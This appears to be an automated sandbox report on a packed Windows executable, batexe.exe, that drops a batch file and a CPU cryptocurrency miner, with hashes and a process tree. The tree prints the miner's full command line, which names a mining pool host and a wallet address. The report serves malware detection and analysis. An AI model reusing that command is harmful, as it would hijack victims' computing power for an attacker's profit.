73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
299s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
13-02-2024 06:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4492	b2e.exe
3928	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3928	cpuminer-sse2.exe
3928	cpuminer-sse2.exe
3928	cpuminer-sse2.exe
3928	cpuminer-sse2.exe
3928	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/520-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 520 wrote to memory of 4492	520	batexe.exe	74
PID 520 wrote to memory of 4492	520	batexe.exe	74
PID 520 wrote to memory of 4492	520	batexe.exe	74
PID 4492 wrote to memory of 2176	4492	b2e.exe	75
PID 4492 wrote to memory of 2176	4492	b2e.exe	75
PID 4492 wrote to memory of 2176	4492	b2e.exe	75
PID 2176 wrote to memory of 3928	2176	cmd.exe	78
PID 2176 wrote to memory of 3928	2176	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:520
- C:\Users\Admin\AppData\Local\Temp\14EA.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\14EA.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\14EA.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1A78.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2176
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\14EA.tmp\b2e.exe

Filesize
674KB

MD5
dda876d7db009ca44fb3095e3b363c50

SHA1
a6947dba51b8204d3f0998bedaacbb7880d412ba

SHA256
e6264e9425b835d80d05fd18b5e2e32d4e3dadf8f06ddfcf465c6a74dbc57571

SHA512
455ff5203a1a6834386fef8aeafaaa5303350db77ec430cc3a05194dc7dccfe19ae3b0b8823e686174575859f7bf38ee690665c92045dd3f8de5f35aa4fa33fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\14EA.tmp\b2e.exe

Filesize
409KB

MD5
2ee549cd474ba74bd87e1fc5c14240b0

SHA1
32134794375b0fac52ee726952ca79357977308d

SHA256
b35f858556860ddc2e7281e858f23db867a1dd1b48ca370ac0b6f0a9eedb0008

SHA512
104a80f5f76af5e531947ece7fafe50ffbc7e242bb87450f3313c64a696d3cce386b2239543433bc4b01f55a12f1a9edd4a92d8ad639e00639e67aa66c495e93

Download Submit
C:\Users\Admin\AppData\Local\Temp\1A78.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.2MB

MD5
cfe9b17f6c934224c96dc30d430d3812

SHA1
e71c3df6e8c29b4a6030f78b6ec6de8c2a2e5534

SHA256
8bb71a06afbfc38e7da1d44f987bdda39d046e823348ccddc21e42d317cb796d

SHA512
a0f75c6c1516040534df6539d526fb788a11d63fa0d5502b5033ef4798803189cf38307c9002476ede57e772ba5d9a2b5cbfc5b7cd2cc3e9f185f7b2d2dbcab0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.3MB

MD5
675f5b95d9293129e1e9237e336c2794

SHA1
3e1d582c077da430d40799a2ba547daaa98e9dca

SHA256
5408e98f2f69de40eb0b33db02845589e271d811a29a28405829b6f5b1b87462

SHA512
420e4bb86573409a22b0030fbf1b84b78906b085af14db21057782910f353db5fd663ee9c762ed853ad95b6df8c084b837b922622a929528fec7a57c42724967

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
831KB

MD5
9c896b0221101eae708d1e9771092ca5

SHA1
9f32032cb699c37c104ed1f1753a218ce849e37a

SHA256
7c8188b3b5d8538b9ec3e4e63ef87e0f4704df6fd66d6c04af7d54be3db15575

SHA512
668597ae6e33a80cb126ef40c1ce1310dd54833fc41ce8b14b54130235137060bece5e720e634da2a3f42ae01567740732f8e8e1a12833368deb3d7fd1c4b567

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.4MB

MD5
a9bf303615c11634b4cd0bd38e77c604

SHA1
fa9beea2dd99686146e46cb066d1609c6e0dd741

SHA256
dd7b2ef8599f15fad7a11bb7d01adcdcea16a22e52d878b36476009be2a923d8

SHA512
99459b1459c5c21a4e7b13d93dc37bc3e3c9afa4a94ee6a10de3e514635e3050cebf185a83ed6bff8fced2f8113ae48ea059ebfec6ce64fa01893c36de218e69

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
616KB

MD5
39db22b1b9b29d9093b5fddc24b5eb52

SHA1
8e9fe682e70695ee6b523cbdebc5651cd02257c1

SHA256
528eebe779605654192d78ae5581923369dd5e9ac39411381869b7252573e608

SHA512
7954f3a49e4a9e6e045007433d743851054acabfde9da143ea0acb1de9623834ccbaab42b1c2ca9f455f4bb55dd34a38bf7bef655a0e96636da8ed6de512c43c

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
535KB

MD5
8658b23b33462aaf4ac625abeca556ea

SHA1
7c4b9915e0cd852955ae4447ad7df1c31bddd570

SHA256
968a1ad98cb1cbcbc4468736052f597a5b1afc95f0f260a5b475750d915ffb5d

SHA512
065a5c5bc822aeb021583a0f5777a7607d235ddc3b97eb3f2bb4c5e099a8b8ada4bd4070775446738d47c7d060b9aa22cc1d00a8e1610eea511bcc4775d54a84

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
522KB

MD5
635b3070590e5b2e8e41b6edddd5146a

SHA1
bec516bbdca2fdf66ff091a6f4ad133e66b25ebb

SHA256
b5b1021c9ebf13dab54a2f961147ec2f93fb3f70ece6a4f17680eb6c95eecc20

SHA512
687ba487d27d2c12dc8baf56e6913bdfabe17c0edd31c3919c567a6e9c7843aefb0f49a1099489c33ffa1f648d66c677f10813e9145287aecde6b7aa00a092f2

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.0MB

MD5
a9e515e851d35a42e27f47da5b52a7fe

SHA1
65841f02511f9ee983ad1fda6f225f5a3b60bd55

SHA256
c2fb9831ba024d311936623de06df8f7a765b6d372fb611a64ce52bcab267ef1

SHA512
f4dca6412b8684b7ec0425eae082808c7e9821396d5a47ce810fd509eba830a86e711a5f52196d25f91688b0b96579da1479a2b34a356b1e016601180dd0d59f

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/520-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3928-43-0x0000000068830000-0x00000000688C8000-memory.dmp

Filesize
608KB

Download
memory/3928-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3928-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3928-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/3928-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3928-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4492-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4492-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download